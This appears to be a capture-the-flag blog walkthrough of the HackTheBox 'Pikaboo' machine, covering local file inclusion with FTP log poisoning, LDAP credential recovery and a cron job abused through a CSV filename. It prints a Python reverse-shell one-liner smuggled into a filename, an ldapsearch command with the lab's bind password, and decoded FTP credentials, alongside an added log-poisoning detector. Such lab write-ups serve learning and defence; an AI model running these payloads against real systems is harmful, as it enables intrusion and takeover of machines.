In this post, I would like to share a walkthrough of the Pikaboo machine from HackTheBox.
This machine is rated as Hard difficulty.
What will you gain from the Pikaboo machine?
For the user flag, you will need to locate a Local File Inclusion vulnerability on the website; combined with the FTP log, it gives you user-level access to the machine.
As for the root flag, you will need to dig deeper within the machine, especially the LDAP service, where you will get a username and password for FTP access.
Information Gathering
Once we have started the VPN connection (the configuration file is downloaded from HackTheBox), we can start information gathering on the machine by executing the command nmap -sC -sV -p- <IP Address> -PN
The scan reveals the domain name “pikaboo.htb”, so we must map it to the machine's IP address in our hosts file.
Let’s open the browser and straight into the website interface.
Surprisingly, nothing useful is found on the website itself.
From the server-status web interface, we notice a few directories that are worth investigating.
Finally, we can easily access the directory /admin../admin_staging, which directs us to a dashboard.
By looking at the website URL, I’m fairly sure that the website has a Local File Inclusion
After roaming the directories on the website, I managed to find /var/log/vsftpd.log, and we can see FTP log entries in that file.
Gaining Privileges Access
First, an nc listener should be running on our terminal to catch the reverse shell connection.
We can use the PHP reverse shell, for which I have written a cheat sheet here.
We need to run ftp pikaboo.htb on the terminal and enter the PHP shell one-liner as our username, so that it is written into the FTP log.
To trigger the reverse shell, we then refresh /var/log/vsftpd.log through the Local File Inclusion.
Voila! When we check the nc listener terminal, we see the reverse shell connection back to us.
We can confirm which user we have managed to access the machine as.
We can read the user flag by executing the “cat user.txt” command.
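From the defender's side, the log-poisoning step above leaves a clear trace: the PHP payload is written verbatim into vsftpd.log as a failed-login username, so the log itself can be monitored for it. The Python below is an added example, not part of the original write-up; the sample log lines are constructed, and the line layout it parses is my assumption about vsftpd's default log format.

```python
import re

# Constructed sample lines in vsftpd's default log format (not from the real box):
# one benign login, one failed login whose "username" carries a PHP open tag.
SAMPLE_LOG = """\
Tue Jul 13 10:01:02 2021 [pid 2] CONNECT: Client "10.10.14.5"
Tue Jul 13 10:01:04 2021 [pid 1] [alice] OK LOGIN: Client "10.10.14.5"
Tue Jul 13 10:02:11 2021 [pid 2] CONNECT: Client "10.10.14.5"
Tue Jul 13 10:02:13 2021 [pid 1] [<?php system($_GET['c']); ?>] FAIL LOGIN: Client "10.10.14.5"
Tue Jul 13 10:03:40 2021 [pid 1] [bob] FAIL LOGIN: Client "10.10.14.9"
"""

# Assumed layout: <timestamp> [pid N] [<user>] <EVENT>: Client "<ip>"
# The username group is greedy so a username containing "] " is still captured whole.
LINE_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} +\d+ [\d:]+ \d{4}) \[pid \d+\] '
    r'(?:\[(?P<user>.*)\] )?(?P<event>[A-Z ]+): Client "(?P<client>[^"]+)"$'
)

# PHP open tags in any case: "<?php", "<?=" or a bare "<?". If such a log line is
# ever included by a PHP script, the interpreter will execute what follows the tag.
PHP_TAG_RE = re.compile(r'<\?(?:php\b|=)?', re.IGNORECASE)


def parse_line(line):
    """Return the parsed fields of one vsftpd log line, or None if unrecognised."""
    m = LINE_RE.match(line.rstrip("\n"))
    return m.groupdict() if m else None


def find_poisoned_logins(log_text):
    """Return entries whose username carries a PHP tag, i.e. log-poisoning attempts."""
    hits = []
    for line in log_text.splitlines():
        entry = parse_line(line)
        if entry and entry["user"] and PHP_TAG_RE.search(entry["user"]):
            hits.append(entry)
    return hits


if __name__ == "__main__":
    for h in find_poisoned_logins(SAMPLE_LOG):
        print(f'{h["ts"]} client={h["client"]} user={h["user"]!r}')
```

The same check works as a first filter in a SIEM rule; the real fix is to keep log files out of any path a web application can include.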
Escalate to Root Privileges Access
Sadly, the “sudo -l” command didn't give us anything useful.
From my experience, it is worth investigating crontab to see which commands have been running recently, especially those running with root privileges.
After fully analyzing the crontab file, I noticed that /usr/local/bin/csvupdate_cron has been running with root privileges.
Analyzing the content of the csvupdate_cron file, we notice that we can abuse the way it processes CSV files.
While roaming inside the server, I noticed a configuration file (/opt/pokeapi/config/settings.php) that looks like the one shown above.
We have managed to get the LDAP bind password from that file, and it might lead to FTP credentials by running the following command:
ldapsearch -x -LLL -h 127.0.0.1 -D 'cn=binduser,ou=users,dc=pikaboo,dc=htb' -w J~42%W?PFHl]g -b 'dc=ftp,dc=pikaboo,dc=htb' -s sub '(objectClass=*)'
In the output of the command above you will see a base64-encoded password, which we need to decode (it is encoded, not encrypted).
The decoded credentials are as below:
Username: pwnmeow
Password: _G0tT4_C4tcH'3m_4lL!_
We should create a file with a name as below (the filename itself carries the payload; replace IP ADDRESS and PORT with your listener):
touch pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'; .csv"
We need to access the machine via the FTP service using the credentials that we found earlier.
Once we have successfully logged in via FTP, we should change into any subdirectory on the FTP service.
Finally, we upload the file with the reverse shell payload as its name, as follows:
put pikaboo "|python3 -c 'import os,pty,socket;s=socket.socket();s.connect((\"IP ADDRESS\",PORT));[os.dup2(s.fileno(),f)for f in(0,1,2)];pty.spawn(\"sh\")'; .csv"
### We need to start our nc listener before running the command above ###
Based on the crontab configuration, it takes around 1 minute to get the reverse shell connection back to us.
We have successfully gained root privileges.
We can read the root flag by executing the command “cat root.txt” and submit the flag on the HackTheBox website.
-THE END-
Happy Learning Guys!
Extra Information
We can go to /etc/shadow to unlock the write-up